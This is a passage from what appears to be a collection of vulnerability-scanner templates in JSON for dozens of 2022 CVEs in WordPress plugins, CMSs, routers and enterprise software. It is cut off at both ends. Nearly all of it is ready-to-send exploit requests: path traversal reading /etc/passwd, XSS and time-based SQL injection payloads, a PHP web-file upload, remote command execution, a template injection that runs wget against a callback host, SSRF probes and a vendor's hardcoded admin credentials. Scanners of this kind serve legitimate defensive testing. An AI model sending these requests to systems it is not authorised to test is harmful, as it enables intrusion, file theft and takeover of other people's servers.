application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42094","info":{"name":"Backdrop CMS version 1.23.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_id\"\n\ncard_node_form\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-13\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[time]\"\n\n21:49:36\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"comment\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryWEcZgRB4detkrGaY--\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-30776","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error: 1<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2863","info":{"name":"WordPress WPvivid Backup <0.9.76 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=WPvivid HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/wp-admin/admin.php?page=WPvivid\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"_ajax_nonce\":\"([0-9a-z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-25356","info":{"name":"Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception: Error while [Loading XML","&lt;RegKey&gt;","&lt;IsAdmin&gt;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23854","info":{"name":"AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","extensions"],"condition":"and"},{"type":"word","part":"header","words":["text/ini","application/octet-stream"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3578","info":{"name":"WordPress ProfileGrid <5.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=pm_add_group&id=\"><script>alert%28document.domain%29<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, \"Extension Options\")","contains(body_2, \"<script>alert(document.domain)</script>&tab\")"],"condition":"and"}]}]},{"id":"CVE-2022-29078","info":{"name":"Node.js Embedded JavaScript 3.1.6 - Template Injection","severity":"critical"},"requests":[{"raw":["GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["You are viewing page number"]}]}]},{"id":"CVE-2022-3242","info":{"name":"Microweber <1.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\") && contains(tolower(body), \"microweber\")"],"condition":"and"}]}]},{"id":"CVE-2022-3768","info":{"name":"WordPress WPSmartContracts <1.3.12 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","@timeout: 15s\nGET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&uid=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Batch Mint NFTs\")"],"condition":"and"}]}]},{"id":"CVE-2022-43018","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>:0"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2373","info":{"name":"WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ssa/v1/users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["response_code\":200","\"email\":\"([a-zA-Z-_0-9@.]+)\",\"display_name\":\"([a-zA-Z-_0-9@.]+)\",\"gravatar_url\":\"http?:\\\\\\/\\\\\\/([a-z0-9A-Z.\\\\\\/?=&@_-]+)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46443","info":{"name":"Bangresto - SQL Injection","severity":"high"},"requests":[{"raw":["POST /bangresto-main/staff/process.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /bangresto-main/staff/insertorder.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded;\n\nitemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-28955","info":{"name":"D-Link DIR-816L - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/category_view.php","{{BaseURL}}/folder_view.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>SharePort Web Access</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38296","info":{"name":"Cuppa CMS v1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /js/jquery_file_upload/server/php/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary9MZjlIG8fVPjrlCI\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"path\"\n\n/\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"unique_name\"\n\ntrue\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_width\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_height\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"crop\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"compress\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"files[]\"; filename=\"test-{{randstr}}.jpg\"\nContent-Type: image/jpeg\n\n<?php\n\necho md5(\"CVE-2022-38296\");\n\n?>\n------WebKitFormBoundary9MZjlIG8fVPjrlCI--\n","POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//{{filename}}\",\"to\":\"//{{randstr}}.php\",\"action\":\"rename\"}\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["ed6bf8b1b4b8e64836455fe32b958c2c"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["\"name\":\"(.*?)\","],"internal":true}]}]},{"id":"CVE-2022-0928","info":{"name":"Microweber < 1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/shop/save_tax_item HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:settings\n\nid=0&name=vat1&type=\"><img+src%3dx+onerror%3dalert(document.domain)>&rate=10\n","POST /module HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer:{{BaseURL}}/admin/view:settings\n\nclass=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3,\"<img src=x onerror=alert(document.domain)></td>\")","contains(header_3,\"text/html\")","status_code_2 == 200 && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-31847","info":{"name":"WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45835","info":{"name":"WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["cURL Test for PhonePe"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25497","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//../../../../../../../../../../../../../etc/passwd\",\"to\":\"/../{{randstr}}.txt\",\"action\":\"copyFile\"}\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0869","info":{"name":"nitely/spirit 0.12.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/login/?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/logout?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/register?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/resend-activation?next=https%3A%2F%2Finteract.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-40359","info":{"name":"Kae's File Manager <=1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /kfm/index.php/'<script>alert(document.domain);</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","x_kfm_changeCaption","kfm_copyFiles"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23134","info":{"name":"Zabbix Setup Configuration Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/setup.php","{{BaseURL}}/setup.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"},"matchers-condition":"and","matchers":[{"type":"word","words":["Database","host","port","Zabbix"],"condition":"and"},{"type":"word","words":["youtube_main","support.google.com"],"part":"header","condition":"and","negative":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37190","info":{"name":"Cuppa CMS v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\naction=system&function=exec&cmd=cat+/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","regex":["postgres:.*:1001:","root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-41840","info":{"name":"Welcart eCommerce <=2.7.7 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1057","info":{"name":"WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-27926","info":{"name":"Zimbra Collaboration (ZCS) - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>Title???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23347","info":{"name":"BigAnt Server v5.6.06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40047","info":{"name":"Flatpress < v1.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}\n\n------WebKitFormBoundary{{randstring}}\nContent-Disposition: form-data; name=\"user\"\n\n{{username}}\n------WebKitFormBoundary{{randstring}}\nContent-Disposition: form-data; name=\"pass\"\n\n{{password}}\n------WebKitFormBoundary{{randstring}}\nContent-Disposition: form-data; name=\"submit\"\n\nLogin\n------WebKitFormBoundary{{randstring}}--\n","GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.domain%29%22autofocus%3d%22zr4da HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"flatpress\")","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=\\\"alert(document.domain)\")"],"condition":"and"}]}]},{"id":"CVE-2022-0678","info":{"name":"Microweber <1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","content=\"Microweber\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-30777","info":{"name":"Parallels H-Sphere 3.6.1713 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30489","info":{"name":"Wavlink WN-535G3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=\")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain);</script>","parent.location.replace(\"http://\")"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33891","info":{"name":"Apache Spark UI - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?doAs=`{{url_encode(\"{{command}}\")}}`"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["19833-2202-EVC"]}]}]},{"id":"CVE-2022-0228","info":{"name":"Popup Builder < 4.0.7 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin-post.php?action=csv_file&orderby=email%2c(select+*+from(select(sleep(7)))b)&order=desc HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains_all(body_2, \"first name\", \"last name\", \"email\")","contains(content_type_2, \"application/octet-stream\")"],"condition":"and"}]}]},{"id":"CVE-2022-1398","info":{"name":"External Media without Import <=1.1.2 - Authenticated Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/upload.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurls=http%3A%2F%2F{{interactsh-url}}&width=&height=&mime-type=&action=add_external_media_without_import\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_2","words":["external-media-without-import"]}]}]},{"id":"CVE-2022-21371","info":{"name":"Oracle WebLogic Server Local File Inclusion","severity":"high"},"requests":[{"method":"GET","raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"path":[".//WEB-INF/weblogic.xml",".//WEB-INF/web.xml"]},"stop-at-first-match":true,"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"<web-app\") && contains(body, \"</web-app>\")","contains(body, \"<weblogic-web-app\") && contains(body, \"</weblogic-web-app>\")"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"text/xml\")","contains(header, \"application/xml\")"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45805","info":{"name":"WordPress Paytm Payment Gateway <=2.7.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/post.php?post=1+AND+(SELECT+6205+FROM+(SELECT(SLEEP(6)))RtRs)&action=edit HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_2, \"toplevel_page_paytm\")"],"condition":"and"}]}]},{"id":"CVE-2022-35413","info":{"name":"WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /webapi/auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid={{username}}&password={{password}}\n"],"payloads":{"username":["systemi"],"password":["db/wp.no1"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"res_msg\":\"Authentication Success.\"","\"doc_id\":\"user_systemi\""],"condition":"and"},{"type":"word","part":"header","words":["WP_SESSID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4295","info":{"name":"Show all comments < 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=</option><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"Select </option>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0288","info":{"name":"WordPress Ad Inserter <2.7.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"body":"html_element_selection=</script><img+src+onerror=alert(document.domain)>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","ad-inserter"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31299","info":{"name":"Haraj 3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script></textarea>","content=\"nextHaraj"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3933","info":{"name":"WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"><script>alert(document.domain)</script>\")","contains(body_2, \"ere_property_gallery\")"],"condition":"and"}]}]},{"id":"CVE-2022-0747","info":{"name":"Infographic Maker iList < 4.3.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcld_upvote_action&post_id=1+AND+(SELECT+1626+FROM+(SELECT(SLEEP(6)))niPH)\n","GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_2 == 200","contains(content_type_2, \"text/javascript\")","contains(body_2, \"show_ilist_templates\")"],"condition":"and"}]}]},{"id":"CVE-2022-21587","info":{"name":"Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; 